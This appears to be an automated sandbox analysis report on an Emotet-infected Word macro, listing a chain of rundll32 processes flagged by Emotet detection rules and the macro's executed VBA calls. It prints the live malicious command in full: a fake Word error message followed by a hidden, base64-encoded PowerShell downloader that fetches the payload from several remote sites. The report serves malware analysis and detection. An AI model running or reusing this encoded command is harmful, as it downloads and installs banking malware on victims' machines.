Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1616 Parent PID: 2860

General

Start time:	13:48:08
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2968 Parent PID: 1616

General

Start time:	13:48:09
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2196 Parent PID: 2968

General

Start time:	13:48:10
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1484 Parent PID: 2196

General

Start time:	13:48:11
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 620 Parent PID: 1484

General

Start time:	13:48:11
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1532 Parent PID: 620

General

Start time:	13:48:12
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1916 Parent PID: 1532

General

Start time:	13:48:13
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1472 Parent PID: 1916

General

Start time:	13:48:14
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 856 Parent PID: 1472

General

Start time:	13:48:15
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Dwztpwkmgv8q9o28r

Declaration

Line	Content
1	Attribute VB_Name = "Dwztpwkmgv8q9o28r"

Executed Functions

Function Tujor4m47ob, APIs: 193, Strings: 112, Number of lines: 302, Relevance: 544.552

APIs	Meta Information
Item
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Kfo_8qx2w7l7x71
ChrW
Hvsf68urunanusc
wdKeyS
A08llnuiz59xyw7
Pgjdd1yrw8qt
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
CreateObject	CreateObject("winmgmtS:win32_process")
Open
Open
Open
Open
Open
Open
Open
Open
Open
Mid
Len	Len("\x01 qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAqq)(s2)(Agqq)(s2)(ACqq)(s2)(QAqq)(s2)(aQqq)(s2)(Bvqq)(s2)(AHqq)(s2)(gAqq)(s2)(Swqq)(s2)(B5qq)(s2)(ADqq)(s2)(IAqq)(s2)(IAqq)(s2)(A9qq)(s2)(ACqq)(s2)(AAqq)(s2)(Wwqq)(s2)(B0qq)(s2)(AFqq)(s2)(kAqq)(s2)(UAqq)(s2)(BFqq)(s2)(AFqq)(s2)(0Aqq)(s2)(KAqq)(s2)(Aiqq)(s2)(AHqq)(s2)(sAqq)(s2)(Mgqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MAqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(Mwqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MQqq)(s2)(B9qq)(s2)(ACqq)(s2)(IAqq)(s2)(LQqq)(s2)(Bmqq)(s2)(ACqq)(s2)(cAqq)(s2)(cwqq)(s2)(BUqq)(s2)(AEqq)(s2)(UAqq)(s2)(bQqq)(s2)(Auqq)(s2)(AGqq)(s2)(kAqq)(s2)(Twqq)(s2)(Auqq)(s2)(AGqq)(s2)(QAqq)(s2)(aQqq)(s2)(BSqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ywqq)(s2)(BUqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(kAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Uwqq)(s2)(B5qq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(8Aqq)(s2)(cgqq)(s2)(Anqq)(s2)(ACqq)(s2)(kAqq)(s2)(IAqq)(s2)(A7qq)(s2)(ACqq)(s2)(AAqq)(s2)(cwqq)(s2)(BFqq)(s2)(AHqq)(s2)(QAqq)(s2)(LQqq)(s2)(BJqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(BNqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(B2qq)(s2)(AGqq)(s2)(EAqq)(s2)(Ugqq)(s2)(Bpqq)(s2)(AGqq)(s2)(EAqq)(s2)(Ygqq)(s2)(BMqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ogqq)(s2)(Axqq)(s2)(ADqq)(s2)(YAqq)(s2)(Vgqq)(s2)(BKqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(Aoqq)(s2)(AFqq)(s2)(sAqq)(s2)(dAqq)(s2)(BZqq)(s2)(AFqq)(s2)(AAqq)(s2)(ZQqq)(s2)(Bdqq)(s2)(ACqq)(s2)(gAqq)(s2)(Igqq)(s2)(B7qq)(s2)(ADqq)(s2)(YAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(cAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(MAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(UAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(AAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(IAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(QAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(EAqq)(s2)(fQqq)(s2)(Aiqq)(s2)(ACqq)(s2)(AAqq)(s2)(LQqq)(s2)(BGqq)(s2)(ACqq)(s2)(cAqq)(s2)(Vgqq)(s2)(Anqq)(s2)(ACqq)(s2)(wAqq)(s2)(Jwqq)(s2)(Byqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(kAqq)(s2)(Ywqq)(s2)(BFqq)(s2)(AFqq)(s2)(AAqq)(s2)(bwqq)(s2)(Bpqq)(s2)(AEqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Tgqq)(s2)(Blqq)(s2)(AFqq)(s2)(QAqq)(s2)(Lgqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AFqq)(s2)(QAqq)(s2)(bQqq)(s2)(Bhqq)(s2)(AEqq)(s2)(4Aqq)(s2)(YQqq)(s2)(BHqq)(s2)(AEqq)(s2)(UAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(ZQqq)(s2)(BSqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(MAqq)(s2)(WQqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(Btqq)(s2)(ACqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Apqq)(s2)(ACqq)(s2)(AAqq)(s2)(KQqq)(s2)(A7qq)(s2)(ACqq)(s2)(QAqq)(s2)(Swqq)(s2)(B0qq)(s2)(ADqq)(s2)(MAqq)(s2)(cwqq)(s2)(Biqq)(s2)(AGqq)(s2)(8Aqq)(s2)(Zwqq)(s2)(A9qq)(s2)(ACqq)(s2)(gAqq)(s2)(Jwqq)(s2)(BCqq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Aoqq)(s2)(ACqq)(s2)(cAqq)(s2)(bQqq)(s2)(Anqq)(s2)(ACqq)(s2)(sAqq)(s2)(Jwqq)(s2)(B2qq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Anqq)(s2)(AGqq)(s2)(sAqq)(s2)(awqq)(s2)(A5qq)(s2)(AHqq)(s2) -> 39020
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgA,,) -> 0
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
